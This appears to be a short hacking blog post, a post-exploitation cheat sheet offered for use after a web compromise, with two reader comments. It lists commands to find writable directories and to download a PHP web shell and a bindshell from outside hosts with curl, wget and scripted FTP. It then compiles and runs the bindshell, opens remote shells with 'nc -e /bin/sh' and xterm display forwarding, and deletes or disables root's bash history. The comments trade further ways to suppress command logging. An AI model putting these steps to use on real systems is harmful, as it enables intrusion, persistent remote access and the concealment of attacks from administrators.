escalation
interesting hack by h3llfyr3
http://www.h4cki.org/index.php?title=From_a_4Images_SQL_Injection_to_Root_Access_-_Privilage_Escalation
also some cool hack from they peers!
find . -perm -2 -ls
The dot being what directory to search, so I would suggest doing:
cd /home/user/public_html/;find . -perm -2 -ls
It will then give you a list of folders and files that are writeable .. Dont forget that there are other downloaders than wget .. Doing the following command will show you what downloaders are running on the box:
which wget curl w3m lynx
For wget:
wget --directory-prefix=[DIR HERE, NO EXTENSION] [URL HERE]
For curl:
curl -o /home/user/public_html/shell.php http://www.shell.txt
cat >bindshell.c
curl -o /home/user/public_html/bindshell.c http://www.server.com/bindshell.c
gcc bindshell.c -o bindshell
./bindshell
echo open 10.0.0.1 > file.txt
echo lcd /writeable/web/dir/ >> file.txt <--this swaps your local directory to one you can write to
echo user anonymous >> file.txt
echo pass anonymous@anon.com >> file.txt
echo get bindshell.c >>file.txt
echo bye >>file.txt
to execute
ftp < file.txt
Other common tech for RSH
tftp -i attacker_ip file (nc)
nc -e /bin/sh -l -p port_number (-DGAPING_SECURITY_HOLE MUST BE compiled)
if victim host has X terminal such as xterm
xterm -display attack_ip:0.0 &
check last 20 entries in history
tail -20 /root/.bash_history
And to remove current .bash_history
rm -rf /root/.bash_history
disable command logging
ln -s /dev/null /root/.bash_history
2 comments:
Would'nt recommend this
> disable command logging
>ln -s /dev/null /root/.bash_history
it leaves a syn link to /dev/null any competant admin will realise it's purpose.
My preference
unset HISTFILE;unset SAVEHIST
Thanks, this is better!
Post a Comment